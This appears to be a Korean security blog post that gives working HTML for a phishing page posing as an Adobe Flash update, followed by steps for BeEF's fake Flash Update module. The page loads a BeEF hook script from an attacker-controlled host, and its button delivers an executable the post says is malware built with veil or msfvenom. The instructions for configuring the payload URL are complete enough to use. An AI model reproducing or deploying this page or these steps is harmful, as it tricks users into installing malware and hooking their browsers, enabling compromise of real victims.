본문 바로가기
3. 웹 애플리케이션 취약점 진단

피싱사이트 [어도비 업데이트 버튼 악성코드] html 코드 및 beef의 fake Flash Update 기능

by Robert8478 2023. 12. 27.

[코드]
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Adobe flash</title>
<script src="http://192.168.0.8:3000/hook.js" charset="utf-8"></script>
</head>
<body><center>
<img src="adobe.jpeg" alt="adobe" width="500" length="500">
<p><input type="button" name="btnDownload" value="Update" onclick="window.open
('AdobeUpdate.exe','download')" return false;/></p>
</body>
</html>

AdobeUpdate.exe 바이러스를 만든 뒤(veil 이나 msfvenom) /var/www/html에 넣어두고 페이지를 열면
adobe.jpeg [미리 만들어둔 adobe 페이크 이미지] 와 함께 피싱페이지가 나오고 버튼을 누르면 바이러스가 다운로드 된다.


하지만 좀 더 레벨 높은 해킹을 위해 beef의 fake Flash Update 기능을 사용한다.
social engineering 목록에 있으며, 
image 란은 http://192.168.0.8:3000/adobe/flash_update.png
payload는 custom_payload
custom payload URL 은 http://192.168.0.8 로 셋 해준뒤 execute를 눌러준다.
그러면 새로운 페이크 어도비 업데이트 창이나오며 install을 누르면 custom payload url로 넘어가게된다.